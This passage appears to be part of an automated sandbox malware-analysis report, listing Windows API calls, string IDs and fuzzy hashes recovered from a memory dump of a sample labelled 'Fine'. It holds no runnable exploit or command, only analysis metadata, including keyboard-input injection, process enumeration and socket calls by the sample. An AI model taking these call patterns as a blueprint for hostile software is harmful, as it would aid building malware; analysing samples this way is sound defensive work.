• _wcslen.LIBCMT ref: 00253AF8
• htons.WSOCK32(00000000,?,?,00000000), ref: 00253B63
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
Similarity
• API ID: ByteCharMultiWide_wcslenhtonsinet_addr
• String ID: 255.255.255.255
• API String ID: 946324512-2422070025
• Opcode ID: 32cc4efad7f52e0c6d0d6ff28ec9aff563e9d72905a52615893bdb471127b002
• Instruction ID: 59bb2890c15e3ff6bdf8e0578389997fa8648fed512d0f5d1e3b18aab56831b7
• Opcode Fuzzy Hash: 32cc4efad7f52e0c6d0d6ff28ec9aff563e9d72905a52615893bdb471127b002
• Instruction Fuzzy Hash: B531D535610202DFCB10CF68C485E69B7F1EF143A9F249159EC168B392D771EE5ACB64
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 002649DC
                                                                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 002649F0
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00264A14
                                                                                                                                                                                                                                                                                                                            Strings
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
Similarity
• API ID: MessageSend$Window
• String ID: SysMonthCal32
• API String ID: 2326795674-1439706946
APIs
• SendMessageW.USER32(00000000,00000469,?,00000000), ref: 002651A3
• SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 002651B1
• DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 002651B8
Strings
Similarity
• API ID: MessageSend$DestroyWindow
• String ID: msctls_updown32
• API String ID: 4014797782-2298589950
APIs
• SendMessageW.USER32(00000000,00000180,00000000,?), ref: 002642DC
• SendMessageW.USER32(?,00000186,00000000,00000000), ref: 002642EC
• MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00264312
Strings
Similarity
• API ID: MessageSend$MoveWindow
• String ID: Listbox
• API String ID: 3315199576-2633736733
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0024544D
• GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 002454A1
• SetErrorMode.KERNEL32(00000000,?,?,0026DCD0), ref: 00245515
Strings
Similarity
• API ID: ErrorMode$InformationVolume
• String ID: %lu
• API String ID: 2507767853-685833217
APIs
• GetActiveWindow.USER32 ref: 00268339
• EnumChildWindows.USER32(?,0026802F,00000000), ref: 002683B0
  • Part of subcall function 001D249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001D24B0
Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$ActiveChildEnumLongWindows
                                                                                                                                                                                                                                                                                                                            • String ID: (*$(*
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00264CED
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00264D02
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00264D0F
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                                                                            • String ID: msctls_trackbar32
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D8577: _wcslen.LIBCMT ref: 001D858A
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002336F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00233712
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002336F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00233723
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002336F4: GetCurrentThreadId.KERNEL32 ref: 0023372A
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002336F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00233731
                                                                                                                                                                                                                                                                                                                            • GetFocus.USER32 ref: 002338C4
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023373B: GetParent.USER32(00000000), ref: 00233746
                                                                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 0023390F
                                                                                                                                                                                                                                                                                                                            • EnumChildWindows.USER32(?,00233987), ref: 00233937
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: %s%d
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 001D5A34
                                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,001D37B8,?,?,?,?,?,001D3709,?,?), ref: 001D5A91
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: DeleteDestroyObjectWindow
                                                                                                                                                                                                                                                                                                                            • String ID: <)*$<)*
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00266360
                                                                                                                                                                                                                                                                                                                            • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 0026638D
                                                                                                                                                                                                                                                                                                                            • DrawMenuBar.USER32(?), ref: 0026639C
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Menu$InfoItem$Draw
                                                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                                                            • API String ID: 3227129158-4108050209
                                                                                                                                                                                                                                                                                                                            • Opcode ID: ba1ddf9a992f4437dc3b5803c269e8a430193e02b1f07ba1028cf7665fe94ba9
                                                                                                                                                                                                                                                                                                                            • Instruction ID: c70d57974224674cdc3cd6fa1448a4a9bb69629a13e59b1e520b5662a2c0f76f
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ba1ddf9a992f4437dc3b5803c269e8a430193e02b1f07ba1028cf7665fe94ba9
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2F01C43152421CEFDB119F11DC88BAE7BB4FF45710F108099E40AD6150CB708AA0EF21
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32(?,002A28E0,0026AD55,000000FC,?,00000000,00000000,?), ref: 0026823F
                                                                                                                                                                                                                                                                                                                            • GetFocus.USER32 ref: 00268247
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001D24B0
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D2234: GetWindowLongW.USER32(?,000000EB), ref: 001D2242
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B0,000001BC,000001C0), ref: 002682B4
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$Long$FocusForegroundMessageSend
                                                                                                                                                                                                                                                                                                                            • String ID: (*
                                                                                                                                                                                                                                                                                                                            • API String ID: 3601265619-1658319840
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 423b2d1ad371217755ae0a8c53ce0edbec4059747e241d178df50122e1db9504
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 251a90ea456b787070147f148f7977e917795dbfc3f30d897193d50545a9fd38
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 423b2d1ad371217755ae0a8c53ce0edbec4059747e241d178df50122e1db9504
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F1018431602941CFC325DF78E858A6A33E6EF8A324F24426DE816973A0CF316C5BCB50
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • DestroyAcceleratorTable.USER32(?), ref: 00268576
                                                                                                                                                                                                                                                                                                                            • CreateAcceleratorTableW.USER32(00000000,?,?,?,0024BE96,00000000,00000000,?,00000001,00000002), ref: 0026858C
                                                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32(?,0024BE96,00000000,00000000,?,00000001,00000002), ref: 00268595
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001D24B0
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: AcceleratorTableWindow$CreateDestroyForegroundLong
                                                                                                                                                                                                                                                                                                                            • String ID: (*
                                                                                                                                                                                                                                                                                                                            • API String ID: 986409557-1658319840
                                                                                                                                                                                                                                                                                                                            • Opcode ID: ffd705723716168ba55c0394ff12d8c4218e829ac503cb1e9ddf7f90c63ecaa8
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 43d92cb433f48f1b0031284ee65a0edc7e81b74e63d6766df0bf5d886bd47370
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ffd705723716168ba55c0394ff12d8c4218e829ac503cb1e9ddf7f90c63ecaa8
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C0014C3061130ACFCB249F69EC8CA6677B1FB15721F61861EF512976B0DB70A9A8CF41
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,002A4038,002A407C), ref: 00268C1A
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32 ref: 00268C2C
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                                                                            • String ID: 8@*$|@*
                                                                                                                                                                                                                                                                                                                            • API String ID: 3712363035-3685754380
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 645ba25ccb897a43ee283a5a0f6bfebd478eb80eb552f57547d1db3c0788b671
                                                                                                                                                                                                                                                                                                                            • Instruction ID: d4f6ac00722909d96c0bd193d537fddfd405deda6e0617591615c23df6081b63
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 645ba25ccb897a43ee283a5a0f6bfebd478eb80eb552f57547d1db3c0788b671
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 93F0BEB2640308BBE3143B61BC49F773E5CEB5A350F000061FB08D61A1DBF18C2096B9
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0022E797
                                                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32 ref: 0022E7BD
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                                                                                            • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                                                                                                                                                                                                            • API String ID: 3013587201-2590602151
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 264fce59554b006b41777baa519ab1f5847d9d71d60a21c83fc1d764eeb1bbb6
                                                                                                                                                                                                                                                                                                                            • Instruction ID: ef0db6e7eb88daa6ec409d1e418436b67b9d2265d35816d8b4efc756fa83355f
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 264fce59554b006b41777baa519ab1f5847d9d71d60a21c83fc1d764eeb1bbb6
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 80E02BB1D31A35BBDF355A606C48E7972186F22700B170598FC06F6140EBB4CDA89664
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            • Opcode ID: c5af6d40dc21c88b1d7101ab2cb3dcee2025b0436bc9e3aa469eb2b30f24ae43
                                                                                                                                                                                                                                                                                                                            • Instruction ID: ec973b843810826a0136e6dfdf4cdba579db2bdd57c84309e455fd870a89f7e4
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5af6d40dc21c88b1d7101ab2cb3dcee2025b0436bc9e3aa469eb2b30f24ae43
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 23C14CB5A1020AEFDB04CF94C8A4EAEB7B5FF48708F108599E505DB251D771EE51CBA0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 0fd46ac390d460ca406ac434c6c958cf7a4848f304db1cbf8300dde2569cb85a
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 64A17CB1A203869FDB11EF18C8917AEBBE5EF51310F2481ADEA559B2C3C3749D61CB50
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00270BD4,?), ref: 00230EE0
                                                                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00270BD4,?), ref: 00230EF8
                                                                                                                                                                                                                                                                                                                            • CLSIDFromProgID.OLE32(?,?,00000000,0026DCE0,000000FF,?,00000000,00000800,00000000,?,00270BD4,?), ref: 00230F1D
                                                                                                                                                                                                                                                                                                                            • _memcmp.LIBVCRUNTIME ref: 00230F3E
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 314563124-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 0025B10C
                                                                                                                                                                                                                                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0025B11A
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001DB329: _wcslen.LIBCMT ref: 001DB333
                                                                                                                                                                                                                                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 0025B1FC
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0025B20B
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001EE36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00214D73,?), ref: 001EE395
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1991900642-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 0025255A
                                                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 00252568
                                                                                                                                                                                                                                                                                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 002525E7
                                                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 002525F1
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ErrorLast$socket
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1881357543-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00266D1A
                                                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00266D4D
                                                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00266DBA
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3880355969-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 002461C8
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 002461EE
                                                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00246213
                                                                                                                                                                                                                                                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0024623F
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3321077145-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0023B473
                                                                                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(00000080), ref: 0023B48F
                                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0023B4FD
                                                                                                                                                                                                                                                                                                                            • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0023B54F
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 432972143-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 0023B5B8
                                                                                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 0023B5D4
                                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 0023B63B
                                                                                                                                                                                                                                                                                                                            • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 0023B68D
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 432972143-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 4868f8ecff5ef4536e7167a0fddbba3b8786201e3d5b4a5b96f8578d9c05148f
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 6e44c902bf2d01e3341992c7a4abbe43f2961b1f5200919c5e901448e37a4e51
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4868f8ecff5ef4536e7167a0fddbba3b8786201e3d5b4a5b96f8578d9c05148f
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E313FB0E2060D5EFF268F2588067FE7779AF88310F44422AE581461D2C7748A658F51
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • ClientToScreen.USER32(?,?), ref: 002680D4
                                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 0026814A
                                                                                                                                                                                                                                                                                                                            • PtInRect.USER32(?,?,?), ref: 0026815A
                                                                                                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 002681C6
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1352109105-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 6fc8796970a973dc87221e98108a2a93a1a25a1865d6c73dcdbff0442f1d5712
                                                                                                                                                                                                                                                                                                                            • Instruction ID: cb3069c372b0c16e2084c607acd2a9757c2aac946ca2d539d82036b7b6d04cc2
